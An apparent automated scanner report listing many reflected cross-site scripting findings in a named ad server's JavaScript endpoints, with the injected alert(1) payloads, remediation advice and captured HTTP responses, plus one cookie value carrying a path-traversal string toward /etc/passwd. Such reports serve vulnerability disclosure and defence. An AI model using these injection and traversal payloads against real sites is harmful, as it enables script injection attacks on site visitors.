The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 787bc'-alert(1)-'bb972807ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:02 GMT
Content-Length: 485
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48284'-alert(1)-'1a524591d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc7a1d176d75a886b936744456; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:00 GMT
Content-Length: 482
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae82'-alert(1)-'477998e8ab0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac83b'-alert(1)-'4a7cc732c20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/be_news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fa92'-alert(1)-'ab795776af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5634a'-alert(1)-'72ece40b226 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a879'-alert(1)-'64a75099063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8840e'-alert(1)-'d174ab07fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/ent_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b65f'-alert(1)-'bf030976c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cedc7'-alert(1)-'a9dad4ab33d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2596'-alert(1)-'065299ab6fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b4c'-alert(1)-'8f565e9fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86cf3'-alert(1)-'c4fb3c8bde4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1595'-alert(1)-'d3ce0ff70fa was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b93'-alert(1)-'1cfbaccfaf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8338
Date: Sat, 17 Sep 2011 01:49:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30420328179_1316224147","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5&size=728x90&imp_id=cm-30420328179_1316224147,12298b058f07061&referrer=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldint ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a58b8(a)cb7eca68845 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8090
Date: Sat, 17 Sep 2011 01:48:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d0f'-alert(1)-'238029b5c84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7400
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30221086088_1316222009","http://ad.doubleclick.net/adj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30221086088_1316222009,12298b058f07061,polit,;;cmw=owl;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8c69'-alert(1)-'5b29faf592d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:33 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30501481718_1316222013","http://ad.doubleclick.net/adj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;net=iblocal;u=,iblocal-30501481718_1316222013,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60a13'-alert(1)-'30c480b6c14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:37 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30201561711_1316222017","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;net=iblocal;u=,iblocal-30201561711_1316222017,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 743e9'-alert(1)-'e734a6f0a30 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:20 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7353
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... iveMedia.createAndAttachAd("iblocal-30322160699_1316222000","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30322160699_1316222000,12298b058f07061,none,;;sz=743e9'-alert(1)-'e734a6f0a30;contx=none;dc=s;btg=?","743e9'-alert(1)-'e734a6f0a30","",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80447'-alert(1)-'f91ca21afff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:51 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219867092_1316221791","http://ad.doubleclick.net/adj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;net=q1;u=,q1-30219867092_1316221791,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb6'-alert(1)-'9d423e3fbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7357
Date: Sat, 17 Sep 2011 01:09:52 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419616533_1316221792","http://ad.doubleclick.net/adj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;net=q1;u=,q1-30419616533_1316221792,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7479'-alert(1)-'d7ae9e9aabb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30503457423_1316221793","http://ad.doubleclick.net/adj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;net=q1;u=,q1-30503457423_1316221793,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7744'-alert(1)-'53b38ddfa3a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7330
Date: Sat, 17 Sep 2011 01:09:49 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... ge="Javascript">CollectiveMedia.createAndAttachAd("q1-30207990841_1316221788","http://ad.doubleclick.net/adj/q1.bosherald/be_news;net=q1;u=,q1-30207990841_1316221788,12298b058f07061,none,;;cmw=nurl;sz=a7744'-alert(1)-'53b38ddfa3a;contx=none;dc=s;btg=?","a7744'-alert(1)-'53b38ddfa3a","",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d09a'-alert(1)-'33f55d64be5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:15 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105513189_1316222415","http://ad.doubleclick.net/adj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;net=q1;u=,q1-30105513189_1316222415,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fae6'-alert(1)-'317c5c0c938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:19 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30323483817_1316222419","http://ad.doubleclick.net/adj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;net=q1;u=,q1-30323483817_1316222419,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0fe9'-alert(1)-'e1c69b32c7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419507438_1316222421","http://ad.doubleclick.net/adj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;net=q1;u=,q1-30419507438_1316222421,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df0e3'-alert(1)-'44b07b60aae was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 01:20:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... age="Javascript">CollectiveMedia.createAndAttachAd("q1-30421855631_1316222407","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-30421855631_1316222407,12298b058f07061,none,;;cmw=nurl;sz=df0e3'-alert(1)-'44b07b60aae;contx=none;dc=s;btg=?","df0e3'-alert(1)-'44b07b60aae","",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8832c'-alert(1)-'b89805fab1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30423216503_1316221793","http://ad.doubleclick.net/adj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;net=q1;u=,q1-30423216503_1316221793,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbba4'-alert(1)-'e84b40c6dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
